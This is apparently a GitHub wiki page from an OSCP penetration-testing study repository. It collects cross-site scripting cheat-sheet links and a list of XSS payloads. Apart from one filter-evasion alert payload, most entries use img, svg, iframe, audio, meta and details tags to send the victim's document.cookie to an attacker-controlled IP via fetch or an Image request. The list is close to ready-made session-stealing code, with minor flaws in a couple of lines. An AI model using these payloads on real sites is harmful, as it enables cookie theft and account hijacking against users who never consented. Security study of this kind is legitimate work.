XSS - A1vinSmith/OSCP-PWK GitHub Wiki
- http://www.xss-payloads.com/
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- https://owasp.org/www-community/xss-filter-evasion-cheatsheet
- http://seguretat.wiki.uoc.edu/index.php/XSS_Cheat_Sheet
- https://github.com/A1vinSmith/prompt-1-to-win-Solutions
Sometimes the filter treat specific tag differently. e.g. <img>
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<img src="valid-image.png" onload="fetch('http://192.168.XX.XX/?c=' + document.cookie)">
'onload='let x = new Image;x.src="http://192.168.XX.XX/?"+document.cookie'
'onerror='var a = new Im-age;a.src="http://192.168.XX.XX/?"+document.cookie'
<svg onload="fetch('http://192.168.XX.XX/?c=' + document.cookie)"></svg>
'onload="fetch('http://192.168.XX.XX/?c=' + document.cookie)"></svg>
<iframe src="javascript:fetch('http://192.168.XX.XX/?c=' + document.cookie)"></iframe>
<meta http-equiv="refresh" content="0; url=http://192.168.XX.XX/?c=' + document.cookie">
<audio src="x" onerror="fetch('http://192.168.XX.XX/?c=' + document.cookie)"></audio>
<details ontoggle="fetch('http://192.168.XX.XX/?c=' + document.cookie)">
<summary>Click me</summary>
</details>